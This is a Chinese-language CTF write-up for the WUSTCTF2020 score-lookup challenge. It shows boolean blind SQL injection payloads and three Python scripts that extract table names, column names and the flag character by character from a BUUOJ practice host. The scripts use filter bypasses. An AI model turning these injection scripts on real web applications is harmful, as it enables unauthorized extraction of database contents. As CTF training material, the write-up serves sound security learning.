WUSTCTF2020颜值成绩查询

首先题目说了查询那正常是sql注入
在搜索框输入1 2 3 4 页面均有变化其他的都没有
各种’ “ 之类的符号都没有什么回显

试一下布尔盲注

1
2
if(length(database())>1,1,0) 
有回显

133.PNG

1
2
if(length(database())>3,1,0) 
无回显

134.PNG

爆表:

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests

s=requests.session()
flag = ''
for i in range(1,50):
    for j in '{qwertyuiopasdfghjklzxcvbnm_@#$%^&*()_+=-0123456789,./?|}':
        url="http://3690b471-adc4-4ce3-9854-38ef7b05bdef.node4.buuoj.cn/?stunum=if((select(substr(group_concat(table_name),{},1))from/**/information_schema.tables/**/where/**/table_schema=database())='{}',1,2)".format(i,j) 
        c = s.get(url ,timeout=3)
        #print c.text
        if 'Hi admin' in c.text:
            flag += j
            print(flag)
            break

爆字段

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests

s=requests.session()
flag = ''
for i in range(1,50):
    for j in '{qwertyuiopasdfghjklzxcvbnm_@#$%^&*()_=-0123456789,./?|}':
        url="http://3690b471-adc4-4ce3-9854-38ef7b05bdef.node4.buuoj.cn/?stunum=if((select(substr(group_concat(column_name),{},1))from/**/information_schema.columns/**/where/**/table_schema=database())='{}',1,2)".format(i,j) 
        c = s.get(url ,timeout=3)
        #print c.text
        if 'Hi admin' in c.text:
            flag += j
            print(flag)
            break

爆值

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests

s=requests.session()
flag = ''
for i in range(1,50):
    for j in '{qwertyuiopasdfghjklzxcvbnm_@#$%^&*()_=-0123456789,./?|}':
        url="http://3690b471-adc4-4ce3-9854-38ef7b05bdef.node4.buuoj.cn/?stunum=if((select(substr(group_concat(value),{},1))from/**/flag)='{}',1,2)".format(i,j) 
        c = s.get(url ,timeout=3)
        #print c.text
        if 'Hi admin' in c.text:
            flag += j
            print(flag)
            break